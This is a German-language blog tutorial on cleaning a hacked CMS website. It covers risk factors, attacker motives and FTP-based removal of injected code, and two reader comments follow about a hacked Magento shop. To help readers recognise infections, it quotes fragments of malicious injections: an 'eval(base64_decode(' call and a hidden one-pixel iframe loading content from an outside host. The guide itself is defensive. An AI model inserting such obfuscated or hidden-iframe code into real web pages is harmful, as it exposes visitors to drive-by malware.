Webseite gehackt – Was nun?

- - Tutorials, Web

Dass grosse Webseiten gehackt werden ist bekannt. Doch was passiert wenn die eigene Webseite plötzlich ungebetene Gäste hat? Woher kommen sie? Und wie verhindert man das Schlimmste?

Betroffene Systeme

Sollten Sie nur statische HTML Seiten als Grundlage für Ihre Webseite verwenden (erkennbar an der Endung einzelner Seiten, z.B. meineseite.ch/kontakt.html) besteht ein geringes Risiko, dass Sie gehackt werden. Sobald Sie aber mit dynamischen Seiten, also z.B. CMS-Lösungen wie WordPress, Joomla etc. arbeiten und im Hintergrund eine Datenbank liegt besteht ein erhöhtes Risiko, dass Sie einem Hackerangriff zum Opfer fallen.

Die Aussage, dass verbreitete CMS-Lösungen verwundbarer als Einzellösungen sind ist aber dennoch nicht richtig. Zwar sind häufig verwendete CMS-Systeme interessanter für Angreifer, andererseits werden Lücken und Fehler auch wesentlich schneller bemerkt und geschlossen. Sofern Ihr CMS entsprechend gewartet und aktualisiert wird reduziert sich das Risiko daher erheblich.

Riskofaktoren

Passwörter

Die übliche Sicherheitslücke gilt auch für Webseiten. Verwenden Sie sichere Passwörter – lang und kompliziert 😉 Als Alternative dazu eignet sich eine zweistufige Authentifzierung wie sie es vielleicht vom E-Banking her kennen. Google bietet dazu mit dem Google Authenticator eine interessante Lösung.

Plugins und Erweiterungen

Sobald ein System durch fremde Erweiterungen ergänzt wird steigt die Gefahr einer Sicherheitslücke. Verwenden Sie nur aktuelle Erweiterungen die regelmässig aktualisiert werden und sauber aufgebaut sind. Hier lohnt sich auch einen Blick auf kostenpflichtige Plugins zu werfen – Sie können sich damit eine Menge Ärger ersparen.

Themes und Designs

Wenn Sie Themes oder Designs für Ihr CMS aus dem Web beziehen, achten Sie auf die Quelle. Sie finden viele kostenpflichtige Themes „kostenlos“ im Netz – leider installieren Sie damit aber manchmal nicht nur das Design sondern auch noch ein Hintertürchen. Auch hier gilt – ein Blick auf kostenpflichtige Themes lohnt sich!

Webhoster

Webhoster gibt es mittlerweile wie Sand am Meer. Ein grosser Teil davon sind sogenannte Reseller, d.h. sie kaufen ein Hostingprodukt ein und verkaufen es weiter. Nicht immer sind die entsprechenden Reseller aber auch zuverlässig oder mit den Gefahren des Webs vertraut. Achten Sie deshalb nicht immer nur auf den Preis, sonder vor allem ob der Hoster wirklich sein eigenes Hosting betreibt und weiss was er tut.

Kenne deinen Feind

Bereits Sunzi wusste; Kenne deinen Feind! Daher ist immer auch die Identifikation der „Hacker“ ein Ziel. Glücklicherweise sind die meisten Attacken „Massenware“, d.h. sie werden nicht gezielt gegen eine Webseite gerichtet sondern gegen alle angreifbaren. Die Tools dazu werden entweder in entsprechenden Foren gekauft oder selbst erstellt.

Hack for money

Malware Webseite

Gehackte Webseiten mit Schadcode werden relativ rasch gesperrt – leider auch für potentielle Kunden oder Besucher…

Um es kurz zu machen – diese Angreifer möchten früher oder später Geld verdienen. Dementsprechend leiten Sie Ihre Besucher entweder um oder laden im Hintergrund Schadsoftware auf die Besucherrechner. Um den Profit zu maximieren laufen diese  Angriffe automatisiert ab, da sich diese Masche nur in grossen Mengen auszahlt (wenn überhaupt…). Dabei werden häufig .php-Files Ihrer Webseite verändert mit der Folge dass die ursprüngliche Webseite entweder gar nicht mehr oder nur noch eingeschränkt funktioniert.

Hack for prestige

Hack for prestige

Anders als beim obigen Beispiel bekennt sich hier eine Gruppe zum Angriff

Mittlerweile gibt es im Web Ranglisten für Gruppen welche die meisten Webseiten infiltriert haben. Der einzige Zweck eines solchen Angriffs ist demnach – Prestige! Obwohl für Besucher keine direkte Gefahr droht, wird auch hier die Webseite verändert um „zu beweisen“ dass sie gehackt wurde – selbstverständlich immer mit einigen Bemerkungen der jeweiligen Gruppe. Im Beispiel links wird netterweise sogar erwähnt wie die Seite in den „Originalzustand“ zurück versetzt werden kann.

Website desinfizieren

Da die gehackte Webseite in den meisten Fällen nicht mehr öffentlich zugänglich ist bzw. nur noch teilweise funktioniert, muss die Desinfektion auf einer anderen Ebene erfolgen – per FTP.

Zugang per FTP verschaffen

Wie man sich Zugang per FTP verschafft wird vielen bekannt sein. Falls nicht – einfach Filezilla herunterladen und mit den entsprechenden Benutzerdaten einloggen. Diese finden sich auf dem Datenblatt des Hosters.

Webseite per FTP desinfiszieren

Sobald die FTP-Verbindung steht, sollte man sich zuerst einen Überblick über die Ordnerstruktur verschaffen. Häufig befinden sich die für uns relevanten Daten im Ordner „httpdocs“. Neben einigen Unterordnern sollte dort auch eine Datei „index.php“ vorhanden sein. Diese einfach mittels Drag&Drop auf den Desktop kopieren und mit einem Texteditor öffnen (Tipp: Notepad ++ eignet sich hervorragend dafür).

 

 

 Schadcode identifizieren

Nun folgt die eigentliche Suche nach dem Schadcode. Irgendwo im Code, häufig aber direkt am Anfang des .php – Files finden sich Zeilen, die einfach nicht so recht hineinpassen wollen. Einige beginnen beispielsweise so:

<script type="text/javascript">// <![CDATA[var
eval(base64_decode(
<iframe src="http://efwel.pro/7dfs32s/" height="1" width="1" frameborder="0" scrolling="no">

Das der Schadcode nicht direkt sichtbar ist sondern verschleiert wird ergibt sich aus dem Zusammenhang – der Angreifer möchte möglichst wenig Spuren hinterlassen. So liegen dann auch die eingebundenen Schadcodeteile meist auf gekaperten Servern – und niemals direkt beim Täter.

Wem die Suche nach „verdächtigem Code“ zu mühsam ist, kann selbstverständlich auch mit Originaldateien vergleichen.

Schadcode entfernen

Da in den wenigsten Fällen nur ein File betroffen ist, müssen wir sämtliche Dateien überprüfen. Dazu setzen wir sämtliche Schritte zusammen:

  1. Schadcode entfernenDownload der gesamten Webseite via FTP (siehe Zugang per FTP)
  2. Identifizierten Schadcode in die Zwischenablage kopieren (siehe Schadcode identifizieren)
  3. Notepad ++ öffnen. Unter „Suchen“ in „Dateien suchen“ das komplette, heruntergeladene Verzeichnis nach dem Schadcode durchsuchen (Bild A)
  4. Falls mehrere Ergebnisse gefunden werden können  im selben Fenster mit „Ersetzen durch“ sämtliche Einträge gelöscht werden (Bild B).
  5. Abschliessend sollten die Dateien noch mit einem Antivirus bspw. Kaspersky gescannt werden (Findet manchmal noch Einträge…)

Hinweise

Es gibt keine Garantie, dass wirklich sämtlicher Schadcode entfernt wurde. Wer auf Nummer sicher gehen will, sollte sämtliche Files durch Originaldateien ersetzen und die Datenbank neu anbinden. Eventuell vorgenommene Modifikation an Design / CMS gehen dabei verloren. Wer über ein Backup verfügt sollte zuallererst dieses einspielen…

Um festzustellen, ob auch andere Webseiten auf demselben Hoster vom Hack betroffen sind lohnt sich ein Blick auf http://www.yougetsignal.com/tools/web-sites-on-web-server/. Dadurch kann man das Ausmass etwa abschätzen und weitere Schritte planen (z.B. Hoster informieren/wechseln)

Wer gerne den Schadcode etwas genauer analysieren möchte kann dazu diverse Onlinetools (z.B. http://www.unphp.net/) verwenden. Diese „entschlüsseln“ den Code mehr oder weniger schlecht…

Wenn die Webseite erneut gehackt wird, sollten die Risikofaktoren auf jeden Fall erneut überprüft werden

Print Friendly, PDF & Email

Es sind zurzeit 2 Kommentare vorhanden.

  1. Hallo,

    unser Magento Shop ist gehackt worden. Wir bieten Drohnen und RC Spielzeuge an. Nachdem ein IT Forensiker unser Onlineshop nach dem Hacking Angriff wieder repariert hat, fragte ich mich wie wir dies in Zukunft verhindern können. Die Aktion kostete uns 2900 EUR und ich weiß nicht ob wir Kundendaten verloren haben? Wahrscheinlich ist es.

    Auf meiner Suche habe ich 2 Angebote gefunden. Eines aus Deutschland und eines aus den USA. Kann mir jemand sagen was man von diesen Angeboten halten kann und für welches sollte ich mich entscheiden?

    Nr. 1 Deutschland
    https://janotta-partner.de/projekt-defense.html

    Nr. 2 USA:
    https://sucuri.net/website-firewall/signup

    Freue mich auf Meinungen…
    Gruß Michael

    • Sobald du einen Webshop betreibst, musst du grundsätzlich damit rechnen, dass du gehackt wirst. Dementsprechend vorsichtig wäre ich mit der Idee „einfach“ einen der vorgeschlagenen Services zu bestellen und dann davon auszugehen, dass du „sicher“ bist. Hier einige Überlegungen:

      • Analyse des Hacks (IT Forensiker…) –> Schwachstelle zukünftig verhindern
      • Backup, Backup, Backup…
      • Webshop immer aktuell halten (v.a. Plugins)
      • Als Alternative zu den obigen Anbietern; schau dir einmal Cloudflare.com an. In Kombination mit einem zuverlässigen Hoster könnte das bereits ausreichen.

      Apropos Hoster; Vielleicht wäre auch ein Wechsel zu einem auf Magento spezialisierten Hoster eine Überlegung wert? Dann hättest du alles aus einer Hand (Performance, Sicherheit…)

      PS: Die diversen Ratings wirken auf mich unglaubwürdig (überall max. Bewertung). Mag kurzfristig funktionieren – mittelfristig wirds eher schaden…

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert